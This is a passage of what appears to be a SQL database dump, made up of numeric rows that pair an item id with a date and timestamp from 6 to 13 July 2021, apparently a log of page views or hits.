14:01:01'),(26946,1600,1,'2021-07-06','2021-07-06 14:53:32'),(26947,1602,1,'2021-07-06','2021-07-06 15:23:59'),(26948,1604,1,'2021-07-06','2021-07-06 15:29:35'),(26949,2159,1,'2021-07-06','2021-07-06 15:47:36'),(26950,1614,1,'2021-07-06','2021-07-06 15:54:14'),(26951,80,1,'2021-07-06','2021-07-06 15:54:30'),(26952,1614,1,'2021-07-06','2021-07-06 16:05:03'),(26953,80,1,'2021-07-06','2021-07-06 16:05:55'),(26954,2248,1,'2021-07-06','2021-07-06 16:27:38'),(26955,68,1,'2021-07-06','2021-07-06 16:29:57'),(26956,68,1,'2021-07-06','2021-07-06 16:30:35'),(26957,2804,1,'2021-07-06','2021-07-06 16:41:04'),(26958,68,1,'2021-07-06','2021-07-06 16:53:22'),(26959,68,1,'2021-07-06','2021-07-06 16:58:20'),(26960,68,1,'2021-07-06','2021-07-06 16:59:19'),(26961,68,1,'2021-07-06','2021-07-06 17:16:21'),(26962,472,1,'2021-07-06','2021-07-06 17:17:03'),(26963,335,1,'2021-07-06','2021-07-06 17:23:46'),(26964,3307,1,'2021-07-06','2021-07-06 17:53:04'),(26965,1602,1,'2021-07-06','2021-07-06 17:57:59'),(26966,87,1,'2021-07-06','2021-07-06 17:59:23'),(26967,87,1,'2021-07-06','2021-07-06 18:01:37'),(26968,1602,1,'2021-07-06','2021-07-06 18:01:40'),(26969,1596,1,'2021-07-06','2021-07-06 19:17:31'),(26970,1596,1,'2021-07-06','2021-07-06 19:17:44'),(26971,3313,1,'2021-07-06','2021-07-06 19:41:02'),(26972,2813,1,'2021-07-06','2021-07-06 20:17:02'),(26973,80,1,'2021-07-06','2021-07-06 20:53:04'),(26974,1606,1,'2021-07-06','2021-07-06 21:22:29'),(26975,1594,1,'2021-07-06','2021-07-06 22:01:50'),(26976,91,1,'2021-07-06','2021-07-06 22:09:21'),(26977,1594,1,'2021-07-06','2021-07-06 22:14:32'),(26978,3259,1,'2021-07-06','2021-07-06 22:23:40'),(26979,2152,1,'2021-07-06','2021-07-06 22:37:51'),(26980,1715,1,'2021-07-06','2021-07-06 22:37:57'),(26981,1594,1,'2021-07-06','2021-07-06 23:11:59'),(26982,2904,1,'2021-07-06','2021-07-06 23:15:33'),(26983,1594,1,'2021-07-06','2021-07-06 23:23:41'),(26984,469,1,'2021-07-06','2021-07-06 23:45:32'),(26985,1604,1,'2021-07-07','2021-07-07 00:20:39'),(26986,3287,1,'2021-07-07','2021-07-07 01:09:02'),(26987,2609,1,'2021-07-07','2021-07-07 01:32:35'),(26988,2410,1,'2021-07-07','2021-07-07 02:07:58'),(26989,3282,1,'2021-07-07','2021-07-07 02:24:13'),(26990,1608,1,'2021-07-07','2021-07-07 02:38:49'),(26991,3691,1,'2021-07-07','2021-07-07 02:43:15'),(26992,2558,1,'2021-07-07','2021-07-07 03:19:12'),(26993,3034,1,'2021-07-07','2021-07-07 03:55:13'),(26994,1592,1,'2021-07-07','2021-07-07 04:31:15'),(26995,3005,1,'2021-07-07','2021-07-07 05:07:14'),(26996,2704,1,'2021-07-07','2021-07-07 05:43:14'),(26997,89,1,'2021-07-07','2021-07-07 06:00:49'),(26998,1602,1,'2021-07-07','2021-07-07 06:01:12'),(26999,76,1,'2021-07-07','2021-07-07 06:13:36'),(27000,2704,1,'2021-07-07','2021-07-07 06:19:14'),(27001,570,1,'2021-07-07','2021-07-07 06:41:49'),(27002,3541,1,'2021-07-07','2021-07-07 06:46:15'),(27003,3069,1,'2021-07-07','2021-07-07 06:55:14'),(27004,91,1,'2021-07-07','2021-07-07 06:56:09'),(27005,3259,1,'2021-07-07','2021-07-07 07:10:25'),(27006,2161,1,'2021-07-07','2021-07-07 07:24:42'),(27007,3307,1,'2021-07-07','2021-07-07 07:31:14'),(27008,2161,1,'2021-07-07','2021-07-07 07:38:59'),(27009,3030,1,'2021-07-07','2021-07-07 07:58:18'),(27010,1602,1,'2021-07-07','2021-07-07 08:06:09'),(27011,3498,1,'2021-07-07','2021-07-07 08:07:14'),(27012,2457,1,'2021-07-07','2021-07-07 08:36:07'),(27013,470,1,'2021-07-07','2021-07-07 08:40:30'),(27014,1610,1,'2021-07-07','2021-07-07 09:16:32'),(27015,2911,1,'2021-07-07','2021-07-07 09:52:31'),(27016,1604,1,'2021-07-07','2021-07-07 10:27:49'),(27017,1600,1,'2021-07-07','2021-07-07 10:34:54'),(27018,1604,1,'2021-07-07','2021-07-07 10:59:08'),(27019,80,1,'2021-07-07','2021-07-07 11:00:29'),(27020,80,1,'2021-07-07','2021-07-07 11:00:33'),(27021,1614,1,'2021-07-07','2021-07-07 11:04:31'),(27022,80,1,'2021-07-07','2021-07-07 11:06:44'),(27023,3486,1,'2021-07-07','2021-07-07 11:40:33'),(27024,1592,1,'2021-07-07','2021-07-07 11:53:09'),(27025,2159,1,'2021-07-07','2021-07-07 12:47:55'),(27026,1604,1,'2021-07-07','2021-07-07 13:10:21'),(27027,1604,1,'2021-07-07','2021-07-07 13:10:23'),(27028,1604,1,'2021-07-07','2021-07-07 13:10:25'),(27029,1592,1,'2021-07-07','2021-07-07 13:45:38'),(27030,76,1,'2021-07-07','2021-07-07 13:46:30'),(27031,1592,1,'2021-07-07','2021-07-07 13:46:43'),(27032,68,1,'2021-07-07','2021-07-07 13:47:23'),(27033,1592,1,'2021-07-07','2021-07-07 13:48:10'),(27034,1596,1,'2021-07-07','2021-07-07 13:50:20'),(27035,477,1,'2021-07-07','2021-07-07 14:55:56'),(27036,1718,1,'2021-07-07','2021-07-07 15:14:41'),(27037,1606,1,'2021-07-07','2021-07-07 15:24:11'),(27038,2309,1,'2021-07-07','2021-07-07 15:51:26'),(27039,1722,1,'2021-07-07','2021-07-07 15:59:04'),(27040,2309,1,'2021-07-07','2021-07-07 16:27:28'),(27041,1747,1,'2021-07-07','2021-07-07 17:03:27'),(27042,2148,1,'2021-07-07','2021-07-07 17:38:40'),(27043,2297,1,'2021-07-07','2021-07-07 18:00:13'),(27044,472,1,'2021-07-07','2021-07-07 18:14:09'),(27045,1715,1,'2021-07-07','2021-07-07 18:36:23'),(27046,1718,1,'2021-07-07','2021-07-07 18:48:49'),(27047,1604,1,'2021-07-07','2021-07-07 19:23:59'),(27048,84,1,'2021-07-07','2021-07-07 19:25:00'),(27049,2297,1,'2021-07-07','2021-07-07 19:54:48'),(27050,1604,1,'2021-07-07','2021-07-07 19:59:22'),(27051,3746,1,'2021-07-07','2021-07-07 20:35:05'),(27052,2297,1,'2021-07-07','2021-07-07 20:46:55'),(27053,2775,1,'2021-07-07','2021-07-07 21:10:34'),(27054,3030,1,'2021-07-07','2021-07-07 21:28:15'),(27055,2178,1,'2021-07-07','2021-07-07 21:45:58'),(27056,3060,1,'2021-07-07','2021-07-07 22:14:21'),(27057,1596,1,'2021-07-07','2021-07-07 22:22:00'),(27058,3109,1,'2021-07-07','2021-07-07 22:22:50'),(27059,1726,1,'2021-07-07','2021-07-07 22:53:21'),(27060,1749,1,'2021-07-07','2021-07-07 22:57:57'),(27061,3664,1,'2021-07-07','2021-07-07 23:23:20'),(27062,1594,1,'2021-07-07','2021-07-07 23:27:42'),(27063,3034,1,'2021-07-07','2021-07-07 23:34:00'),(27064,1766,1,'2021-07-08','2021-07-08 00:10:00'),(27065,2490,1,'2021-07-08','2021-07-08 00:45:57'),(27066,1588,1,'2021-07-08','2021-07-08 01:21:58'),(27067,1586,1,'2021-07-08','2021-07-08 02:34:49'),(27068,1600,1,'2021-07-08','2021-07-08 04:21:59'),(27069,80,1,'2021-07-08','2021-07-08 04:27:08'),(27070,68,1,'2021-07-08','2021-07-08 04:27:12'),(27071,108,1,'2021-07-08','2021-07-08 04:27:16'),(27072,2904,1,'2021-07-08','2021-07-08 04:27:19'),(27073,1600,1,'2021-07-08','2021-07-08 04:58:01'),(27074,1586,1,'2021-07-08','2021-07-08 05:34:00'),(27075,80,1,'2021-07-08','2021-07-08 06:06:43'),(27076,2751,1,'2021-07-08','2021-07-08 06:10:00'),(27077,3127,1,'2021-07-08','2021-07-08 07:21:58'),(27078,80,1,'2021-07-08','2021-07-08 07:58:00'),(27079,1582,1,'2021-07-08','2021-07-08 08:23:55'),(27080,3243,1,'2021-07-08','2021-07-08 08:34:18'),(27081,2419,1,'2021-07-08','2021-07-08 09:45:58'),(27082,2159,1,'2021-07-08','2021-07-08 09:46:40'),(27083,1588,1,'2021-07-08','2021-07-08 09:59:23'),(27084,1608,1,'2021-07-08','2021-07-08 10:06:01'),(27085,2309,1,'2021-07-08','2021-07-08 10:14:32'),(27086,1594,1,'2021-07-08','2021-07-08 10:14:51'),(27087,2159,1,'2021-07-08','2021-07-08 10:16:43'),(27088,1544,1,'2021-07-08','2021-07-08 10:17:25'),(27089,1586,1,'2021-07-08','2021-07-08 10:19:09'),(27090,1544,1,'2021-07-08','2021-07-08 10:19:28'),(27091,1586,1,'2021-07-08','2021-07-08 10:21:09'),(27092,3313,1,'2021-07-08','2021-07-08 10:21:59'),(27093,1592,1,'2021-07-08','2021-07-08 10:35:19'),(27094,1592,1,'2021-07-08','2021-07-08 10:37:03'),(27095,1582,1,'2021-07-08','2021-07-08 10:38:10'),(27096,1592,1,'2021-07-08','2021-07-08 10:43:39'),(27097,1594,1,'2021-07-08','2021-07-08 10:44:06'),(27098,1592,1,'2021-07-08','2021-07-08 10:44:45'),(27099,1726,1,'2021-07-08','2021-07-08 10:46:39'),(27100,1774,1,'2021-07-08','2021-07-08 10:57:57'),(27101,486,1,'2021-07-08','2021-07-08 11:14:37'),(27102,1602,1,'2021-07-08','2021-07-08 11:27:54'),(27103,2150,1,'2021-07-08','2021-07-08 11:29:38'),(27104,3285,1,'2021-07-08','2021-07-08 11:33:31'),(27105,2309,1,'2021-07-08','2021-07-08 11:34:04'),(27106,72,1,'2021-07-08','2021-07-08 11:44:37'),(27107,3664,1,'2021-07-08','2021-07-08 11:44:38'),(27108,1737,1,'2021-07-08','2021-07-08 11:50:36'),(27109,486,1,'2021-07-08','2021-07-08 11:59:36'),(27110,2309,1,'2021-07-08','2021-07-08 12:10:00'),(27111,2309,1,'2021-07-08','2021-07-08 12:10:00'),(27112,2150,1,'2021-07-08','2021-07-08 12:14:45'),(27113,3691,1,'2021-07-08','2021-07-08 12:40:54'),(27114,1726,1,'2021-07-08','2021-07-08 12:44:37'),(27115,3087,1,'2021-07-08','2021-07-08 12:44:59'),(27116,2309,1,'2021-07-08','2021-07-08 12:49:29'),(27117,1600,1,'2021-07-08','2021-07-08 12:58:08'),(27118,2159,1,'2021-07-08','2021-07-08 12:59:04'),(27119,1588,1,'2021-07-08','2021-07-08 12:59:09'),(27120,2148,1,'2021-07-08','2021-07-08 13:22:01'),(27121,1602,1,'2021-07-08','2021-07-08 13:24:51'),(27122,3051,1,'2021-07-08','2021-07-08 13:44:36'),(27123,467,1,'2021-07-08','2021-07-08 13:45:24'),(27124,467,1,'2021-07-08','2021-07-08 13:45:27'),(27125,3746,1,'2021-07-08','2021-07-08 13:57:14'),(27126,1718,1,'2021-07-08','2021-07-08 14:33:09'),(27127,1594,1,'2021-07-08','2021-07-08 14:40:02'),(27128,3691,1,'2021-07-08','2021-07-08 15:09:11'),(27129,1614,1,'2021-07-08','2021-07-08 16:05:52'),(27130,2809,1,'2021-07-08','2021-07-08 16:20:42'),(27131,1715,1,'2021-07-08','2021-07-08 16:23:04'),(27132,1766,1,'2021-07-08','2021-07-08 16:33:52'),(27133,1612,1,'2021-07-08','2021-07-08 17:25:59'),(27134,1614,1,'2021-07-08','2021-07-08 17:26:57'),(27135,2769,1,'2021-07-08','2021-07-08 17:27:05'),(27136,2965,1,'2021-07-08','2021-07-08 17:27:08'),(27137,1770,1,'2021-07-08','2021-07-08 17:30:25'),(27138,1582,1,'2021-07-08','2021-07-08 17:40:12'),(27139,2178,1,'2021-07-08','2021-07-08 18:06:25'),(27140,3742,1,'2021-07-08','2021-07-08 18:42:24'),(27141,1586,1,'2021-07-08','2021-07-08 19:07:38'),(27142,469,1,'2021-07-08','2021-07-08 19:18:25'),(27143,1600,1,'2021-07-08','2021-07-08 19:35:37'),(27144,1594,1,'2021-07-08','2021-07-08 19:40:19'),(27145,1600,1,'2021-07-08','2021-07-08 19:40:23'),(27146,1594,1,'2021-07-08','2021-07-08 19:40:25'),(27147,2775,1,'2021-07-08','2021-07-08 20:02:48'),(27148,2159,1,'2021-07-08','2021-07-08 20:22:16'),(27149,1614,1,'2021-07-08','2021-07-08 20:30:29'),(27150,2804,1,'2021-07-08','2021-07-08 21:06:26'),(27151,2150,1,'2021-07-08','2021-07-08 21:22:16'),(27152,2658,1,'2021-07-08','2021-07-08 21:27:50'),(27153,2309,1,'2021-07-08','2021-07-08 22:07:35'),(27154,468,1,'2021-07-08','2021-07-08 22:18:27'),(27155,3251,1,'2021-07-08','2021-07-08 22:52:44'),(27156,1596,1,'2021-07-09','2021-07-09 00:02:17'),(27157,2609,1,'2021-07-09','2021-07-09 00:24:38'),(27158,3498,1,'2021-07-09','2021-07-09 00:38:16'),(27159,1602,1,'2021-07-09','2021-07-09 01:46:26'),(27160,3083,1,'2021-07-09','2021-07-09 01:50:16'),(27161,1586,1,'2021-07-09','2021-07-09 03:02:16'),(27162,3030,1,'2021-07-09','2021-07-09 03:56:47'),(27163,3251,1,'2021-07-09','2021-07-09 04:08:14'),(27164,3051,1,'2021-07-09','2021-07-09 04:08:20'),(27165,474,1,'2021-07-09','2021-07-09 04:39:23'),(27166,1600,1,'2021-07-09','2021-07-09 06:38:16'),(27167,1606,1,'2021-07-09','2021-07-09 07:11:49'),(27168,1602,1,'2021-07-09','2021-07-09 08:30:44'),(27169,2159,1,'2021-07-09','2021-07-09 09:26:51'),(27170,1600,1,'2021-07-09','2021-07-09 09:37:58'),(27171,1726,1,'2021-07-09','2021-07-09 10:26:52'),(27172,1582,1,'2021-07-09','2021-07-09 10:31:43'),(27173,1586,1,'2021-07-09','2021-07-09 10:50:00'),(27174,2150,1,'2021-07-09','2021-07-09 10:56:52'),(27175,3313,1,'2021-07-09','2021-07-09 11:25:57'),(27176,2159,1,'2021-07-09','2021-07-09 11:26:52'),(27177,486,1,'2021-07-09','2021-07-09 11:56:52'),(27178,469,1,'2021-07-09','2021-07-09 12:01:59'),(27179,1602,1,'2021-07-09','2021-07-09 12:11:37'),(27180,1596,1,'2021-07-09','2021-07-09 12:25:58'),(27181,1596,1,'2021-07-09','2021-07-09 12:25:59'),(27182,1596,1,'2021-07-09','2021-07-09 12:25:59'),(27183,3691,1,'2021-07-09','2021-07-09 12:37:35'),(27184,470,1,'2021-07-09','2021-07-09 13:10:21'),(27185,1594,1,'2021-07-09','2021-07-09 13:17:17'),(27186,1594,1,'2021-07-09','2021-07-09 13:17:45'),(27187,1602,1,'2021-07-09','2021-07-09 13:18:46'),(27188,1602,1,'2021-07-09','2021-07-09 13:20:01'),(27189,76,1,'2021-07-09','2021-07-09 13:22:28'),(27190,84,1,'2021-07-09','2021-07-09 13:22:31'),(27191,76,1,'2021-07-09','2021-07-09 13:22:47'),(27192,1594,1,'2021-07-09','2021-07-09 13:23:00'),(27193,1877,1,'2021-07-09','2021-07-09 13:45:26'),(27194,3691,1,'2021-07-09','2021-07-09 14:21:27'),(27195,3313,1,'2021-07-09','2021-07-09 14:57:27'),(27196,1726,1,'2021-07-09','2021-07-09 15:01:52'),(27197,474,1,'2021-07-09','2021-07-09 15:31:50'),(27198,3664,1,'2021-07-09','2021-07-09 15:31:51'),(27199,2617,1,'2021-07-09','2021-07-09 15:33:10'),(27200,1598,1,'2021-07-09','2021-07-09 15:44:04'),(27201,1598,1,'2021-07-09','2021-07-09 15:44:14'),(27202,2150,1,'2021-07-09','2021-07-09 16:28:17'),(27203,80,1,'2021-07-09','2021-07-09 16:48:28'),(27204,1610,1,'2021-07-09','2021-07-09 17:21:10'),(27205,486,1,'2021-07-09','2021-07-09 17:26:53'),(27206,476,1,'2021-07-09','2021-07-09 17:57:10'),(27207,1606,1,'2021-07-09','2021-07-09 18:31:46'),(27208,76,1,'2021-07-09','2021-07-09 18:33:11'),(27209,2410,1,'2021-07-09','2021-07-09 19:09:10'),(27210,2751,1,'2021-07-09','2021-07-09 20:18:47'),(27211,1747,1,'2021-07-09','2021-07-09 21:30:48'),(27212,1598,1,'2021-07-09','2021-07-09 22:12:08'),(27213,1606,1,'2021-07-09','2021-07-09 22:38:13'),(27214,1606,1,'2021-07-09','2021-07-09 22:39:53'),(27215,1600,1,'2021-07-09','2021-07-09 23:22:12'),(27216,2148,1,'2021-07-09','2021-07-09 23:51:38'),(27217,1602,1,'2021-07-10','2021-07-10 00:05:52'),(27218,1711,1,'2021-07-10','2021-07-10 00:27:37'),(27219,3107,1,'2021-07-10','2021-07-10 01:03:38'),(27220,1602,1,'2021-07-10','2021-07-10 01:16:00'),(27221,108,1,'2021-07-10','2021-07-10 01:17:10'),(27222,89,1,'2021-07-10','2021-07-10 01:19:12'),(27223,3280,1,'2021-07-10','2021-07-10 01:20:51'),(27224,1602,1,'2021-07-10','2021-07-10 01:21:01'),(27225,3273,1,'2021-07-10','2021-07-10 01:35:52'),(27226,3045,1,'2021-07-10','2021-07-10 01:39:36'),(27227,3534,1,'2021-07-10','2021-07-10 02:15:37'),(27228,3055,1,'2021-07-10','2021-07-10 02:35:53'),(27229,2989,1,'2021-07-10','2021-07-10 02:51:37'),(27230,469,1,'2021-07-10','2021-07-10 03:25:19'),(27231,2911,1,'2021-07-10','2021-07-10 03:26:30'),(27232,473,1,'2021-07-10','2021-07-10 03:57:51'),(27233,3261,1,'2021-07-10','2021-07-10 04:05:52'),(27234,471,1,'2021-07-10','2021-07-10 04:35:52'),(27235,2775,1,'2021-07-10','2021-07-10 05:07:37'),(27236,3742,1,'2021-07-10','2021-07-10 05:41:19'),(27237,469,1,'2021-07-10','2021-07-10 06:16:27'),(27238,1745,1,'2021-07-10','2021-07-10 06:52:25'),(27239,1766,1,'2021-07-10','2021-07-10 08:02:21'),(27240,477,1,'2021-07-10','2021-07-10 08:38:20'),(27241,1600,1,'2021-07-10','2021-07-10 08:50:15'),(27242,1584,1,'2021-07-10','2021-07-10 09:14:21'),(27243,1588,1,'2021-07-10','2021-07-10 09:17:28'),(27244,1724,1,'2021-07-10','2021-07-10 09:18:21'),(27245,3005,1,'2021-07-10','2021-07-10 09:50:19'),(27246,3498,1,'2021-07-10','2021-07-10 10:26:20'),(27247,1602,1,'2021-07-10','2021-07-10 10:42:42'),(27248,3109,1,'2021-07-10','2021-07-10 11:02:21'),(27249,1592,1,'2021-07-10','2021-07-10 11:35:53'),(27250,80,1,'2021-07-10','2021-07-10 11:36:28'),(27251,68,1,'2021-07-10','2021-07-10 11:48:27'),(27252,3285,1,'2021-07-10','2021-07-10 12:11:31'),(27253,3498,1,'2021-07-10','2021-07-10 12:47:33'),(27254,1602,1,'2021-07-10','2021-07-10 12:57:01'),(27255,3430,1,'2021-07-10','2021-07-10 13:22:40'),(27256,470,1,'2021-07-10','2021-07-10 13:57:16'),(27257,1602,1,'2021-07-10','2021-07-10 14:13:00'),(27258,1734,1,'2021-07-10','2021-07-10 14:32:21'),(27259,1728,1,'2021-07-10','2021-07-10 15:08:17'),(27260,3489,1,'2021-07-10','2021-07-10 15:44:19'),(27261,1586,1,'2021-07-10','2021-07-10 15:52:05'),(27262,1602,1,'2021-07-10','2021-07-10 15:58:04'),(27263,87,1,'2021-07-10','2021-07-10 15:58:32'),(27264,87,1,'2021-07-10','2021-07-10 15:59:02'),(27265,1602,1,'2021-07-10','2021-07-10 15:59:22'),(27266,1602,1,'2021-07-10','2021-07-10 16:00:54'),(27267,1602,1,'2021-07-10','2021-07-10 16:12:03'),(27268,1602,1,'2021-07-10','2021-07-10 16:12:26'),(27269,1596,1,'2021-07-10','2021-07-10 16:42:35'),(27270,3243,1,'2021-07-10','2021-07-10 16:56:18'),(27271,84,1,'2021-07-10','2021-07-10 17:32:20'),(27272,1614,1,'2021-07-10','2021-07-10 17:59:33'),(27273,1608,1,'2021-07-10','2021-07-10 18:47:33'),(27274,3261,1,'2021-07-10','2021-07-10 18:50:41'),(27275,2309,1,'2021-07-10','2021-07-10 18:57:28'),(27276,1586,1,'2021-07-10','2021-07-10 19:20:21'),(27277,1728,1,'2021-07-10','2021-07-10 19:20:58'),(27278,1728,1,'2021-07-10','2021-07-10 19:21:31'),(27279,1596,1,'2021-07-10','2021-07-10 19:51:33'),(27280,1596,1,'2021-07-10','2021-07-10 19:51:59'),(27281,2309,1,'2021-07-10','2021-07-10 19:56:21'),(27282,2309,1,'2021-07-10','2021-07-10 20:32:19'),(27283,3486,1,'2021-07-10','2021-07-10 20:38:36'),(27284,1602,1,'2021-07-10','2021-07-10 20:51:03'),(27285,80,1,'2021-07-10','2021-07-10 20:52:06'),(27286,1600,1,'2021-07-10','2021-07-10 20:54:58'),(27287,1766,1,'2021-07-10','2021-07-10 21:24:15'),(27288,1602,1,'2021-07-10','2021-07-10 22:44:53'),(27289,2178,1,'2021-07-10','2021-07-10 23:32:18'),(27290,1582,1,'2021-07-11','2021-07-11 00:52:58'),(27291,1612,1,'2021-07-11','2021-07-11 01:20:27'),(27292,89,1,'2021-07-11','2021-07-11 01:56:13'),(27293,89,1,'2021-07-11','2021-07-11 02:30:22'),(27294,1594,1,'2021-07-11','2021-07-11 02:47:04'),(27295,1747,1,'2021-07-11','2021-07-11 03:05:20'),(27296,2813,1,'2021-07-11','2021-07-11 03:41:20'),(27297,74,1,'2021-07-11','2021-07-11 04:08:38'),(27298,2558,1,'2021-07-11','2021-07-11 04:17:19'),(27299,1741,1,'2021-07-11','2021-07-11 06:05:21'),(27300,1749,1,'2021-07-11','2021-07-11 06:41:19'),(27301,3083,1,'2021-07-11','2021-07-11 07:53:21'),(27302,3247,1,'2021-07-11','2021-07-11 08:30:10'),(27303,3724,1,'2021-07-11','2021-07-11 09:05:20'),(27304,2801,1,'2021-07-11','2021-07-11 09:41:21'),(27305,3051,1,'2021-07-11','2021-07-11 09:52:15'),(27306,3127,1,'2021-07-11','2021-07-11 10:17:22'),(27307,3664,1,'2021-07-11','2021-07-11 10:22:15'),(27308,1602,1,'2021-07-11','2021-07-11 10:24:53'),(27309,2457,1,'2021-07-11','2021-07-11 10:46:46'),(27310,1726,1,'2021-07-11','2021-07-11 10:52:14'),(27311,3226,1,'2021-07-11','2021-07-11 11:14:05'),(27312,2159,1,'2021-07-11','2021-07-11 11:22:14'),(27313,1600,1,'2021-07-11','2021-07-11 12:05:22'),(27314,3051,1,'2021-07-11','2021-07-11 12:16:52'),(27315,486,1,'2021-07-11','2021-07-11 12:22:14'),(27316,2704,1,'2021-07-11','2021-07-11 12:41:20'),(27317,3261,1,'2021-07-11','2021-07-11 12:41:23'),(27318,1726,1,'2021-07-11','2021-07-11 12:52:15'),(27319,1600,1,'2021-07-11','2021-07-11 13:15:26'),(27320,1711,1,'2021-07-11','2021-07-11 13:41:23'),(27321,2704,1,'2021-07-11','2021-07-11 13:51:00'),(27322,1608,1,'2021-07-11','2021-07-11 14:32:31'),(27323,1747,1,'2021-07-11','2021-07-11 15:02:58'),(27324,3746,1,'2021-07-11','2021-07-11 15:38:56'),(27325,2159,1,'2021-07-11','2021-07-11 16:08:20'),(27326,2419,1,'2021-07-11','2021-07-11 16:50:58'),(27327,486,1,'2021-07-11','2021-07-11 17:08:37'),(27328,1782,1,'2021-07-11','2021-07-11 17:26:58'),(27329,1596,1,'2021-07-11','2021-07-11 17:35:02'),(27330,1596,1,'2021-07-11','2021-07-11 17:37:21'),(27331,2150,1,'2021-07-11','2021-07-11 17:38:19'),(27332,2152,1,'2021-07-11','2021-07-11 18:02:58'),(27333,3664,1,'2021-07-11','2021-07-11 18:08:22'),(27334,1602,1,'2021-07-11','2021-07-11 18:23:01'),(27335,3257,1,'2021-07-11','2021-07-11 18:38:58'),(27336,2150,1,'2021-07-11','2021-07-11 18:52:14'),(27337,476,1,'2021-07-11','2021-07-11 20:24:35'),(27338,2165,1,'2021-07-11','2021-07-11 21:00:34'),(27339,472,1,'2021-07-11','2021-07-11 21:17:56'),(27340,3226,1,'2021-07-11','2021-07-11 21:31:34'),(27341,3705,1,'2021-07-11','2021-07-11 21:39:15'),(27342,3705,1,'2021-07-11','2021-07-11 21:40:00'),(27343,570,1,'2021-07-11','2021-07-11 21:45:51'),(27344,1770,1,'2021-07-11','2021-07-11 22:10:35'),(27345,1743,1,'2021-07-11','2021-07-11 23:40:08'),(27346,3099,1,'2021-07-11','2021-07-11 23:58:34'),(27347,1586,1,'2021-07-12','2021-07-12 00:07:14'),(27348,1586,1,'2021-07-12','2021-07-12 02:06:21'),(27349,1602,1,'2021-07-12','2021-07-12 03:25:47'),(27350,1544,1,'2021-07-12','2021-07-12 03:26:39'),(27351,1586,1,'2021-07-12','2021-07-12 04:00:59'),(27352,1602,1,'2021-07-12','2021-07-12 04:55:15'),(27353,1586,1,'2021-07-12','2021-07-12 05:45:53'),(27354,1602,1,'2021-07-12','2021-07-12 05:47:23'),(27355,570,1,'2021-07-12','2021-07-12 05:48:18'),(27356,72,1,'2021-07-12','2021-07-12 05:52:30'),(27357,3698,1,'2021-07-12','2021-07-12 05:53:27'),(27358,1604,1,'2021-07-12','2021-07-12 06:15:38'),(27359,1582,1,'2021-07-12','2021-07-12 06:21:51'),(27360,1582,1,'2021-07-12','2021-07-12 06:57:58'),(27361,3045,1,'2021-07-12','2021-07-12 07:45:29'),(27362,2989,1,'2021-07-12','2021-07-12 08:45:51'),(27363,1600,1,'2021-07-12','2021-07-12 09:21:53'),(27364,1718,1,'2021-07-12','2021-07-12 09:28:06'),(27365,2309,1,'2021-07-12','2021-07-12 09:57:49'),(27366,1770,1,'2021-07-12','2021-07-12 09:59:02'),(27367,2609,1,'2021-07-12','2021-07-12 10:33:57'),(27368,1596,1,'2021-07-12','2021-07-12 10:34:55'),(27369,1596,1,'2021-07-12','2021-07-12 10:35:40'),(27370,2309,1,'2021-07-12','2021-07-12 10:47:30'),(27371,1600,1,'2021-07-12','2021-07-12 11:09:51'),(27372,2309,1,'2021-07-12','2021-07-12 11:45:51'),(27373,1586,1,'2021-07-12','2021-07-12 12:17:27'),(27374,3307,1,'2021-07-12','2021-07-12 12:21:50'),(27375,1594,1,'2021-07-12','2021-07-12 12:25:25'),(27376,2309,1,'2021-07-12','2021-07-12 12:31:55'),(27377,2989,1,'2021-07-12','2021-07-12 12:41:17'),(27378,2159,1,'2021-07-12','2021-07-12 12:42:20'),(27379,1582,1,'2021-07-12','2021-07-12 12:55:35'),(27380,2609,1,'2021-07-12','2021-07-12 13:33:49'),(27381,1596,1,'2021-07-12','2021-07-12 14:09:50'),(27382,1606,1,'2021-07-12','2021-07-12 14:31:39'),(27383,3307,1,'2021-07-12','2021-07-12 14:46:38'),(27384,1602,1,'2021-07-12','2021-07-12 14:51:15'),(27385,1602,1,'2021-07-12','2021-07-12 14:51:55'),(27386,2411,1,'2021-07-12','2021-07-12 14:55:18'),(27387,1776,1,'2021-07-12','2021-07-12 14:56:21'),(27388,1602,1,'2021-07-12','2021-07-12 15:12:56'),(27389,2309,1,'2021-07-12','2021-07-12 15:15:21'),(27390,469,1,'2021-07-12','2021-07-12 15:21:50'),(27391,1596,1,'2021-07-12','2021-07-12 15:57:47'),(27392,570,1,'2021-07-12','2021-07-12 15:57:56'),(27393,1602,1,'2021-07-12','2021-07-12 16:46:09'),(27394,2297,1,'2021-07-12','2021-07-12 16:47:12'),(27395,2309,1,'2021-07-12','2021-07-12 16:58:06'),(27396,3438,1,'2021-07-12','2021-07-12 17:09:49'),(27397,3430,1,'2021-07-12','2021-07-12 17:11:02'),(27398,84,1,'2021-07-12','2021-07-12 18:04:41'),(27399,1594,1,'2021-07-12','2021-07-12 18:08:35'),(27400,1608,1,'2021-07-12','2021-07-12 18:43:16'),(27401,1608,1,'2021-07-12','2021-07-12 18:43:17'),(27402,3438,1,'2021-07-12','2021-07-12 18:48:40'),(27403,3226,1,'2021-07-12','2021-07-12 18:53:23'),(27404,1705,1,'2021-07-12','2021-07-12 18:53:26'),(27405,1705,1,'2021-07-12','2021-07-12 18:53:26'),(27406,1594,1,'2021-07-12','2021-07-12 18:56:45'),(27407,1608,1,'2021-07-12','2021-07-12 19:01:36'),(27408,1608,1,'2021-07-12','2021-07-12 19:05:02'),(27409,470,1,'2021-07-12','2021-07-12 19:12:34'),(27410,469,1,'2021-07-12','2021-07-12 19:44:18'),(27411,3030,1,'2021-07-12','2021-07-12 19:49:00'),(27412,3107,1,'2021-07-12','2021-07-12 20:14:10'),(27413,1608,1,'2021-07-12','2021-07-12 20:17:53'),(27414,3083,1,'2021-07-12','2021-07-12 21:19:16'),(27415,484,1,'2021-07-12','2021-07-12 21:49:14'),(27416,1586,1,'2021-07-12','2021-07-12 22:02:31'),(27417,1586,1,'2021-07-12','2021-07-12 22:02:32'),(27418,1586,1,'2021-07-12','2021-07-12 22:02:49'),(27419,3694,1,'2021-07-12','2021-07-12 22:18:54'),(27420,3735,1,'2021-07-12','2021-07-12 22:22:38'),(27421,3541,1,'2021-07-12','2021-07-12 22:56:54'),(27422,3764,1,'2021-07-12','2021-07-12 23:13:31'),(27423,1774,1,'2021-07-12','2021-07-12 23:32:54'),(27424,478,1,'2021-07-12','2021-07-12 23:44:23'),(27425,1606,1,'2021-07-12','2021-07-12 23:50:23'),(27426,2154,1,'2021-07-13','2021-07-13 00:20:55'),(27427,478,1,'2021-07-13','2021-07-13 01:14:22'),(27428,3107,1,'2021-07-13','2021-07-13 02:01:24'),(27429,1598,1,'2021-07-13','2021-07-13 03:08:55'),(27430,2309,1,'2021-07-13','2021-07-13 03:44:56'),(27431,3261,1,'2021-07-13','2021-07-13 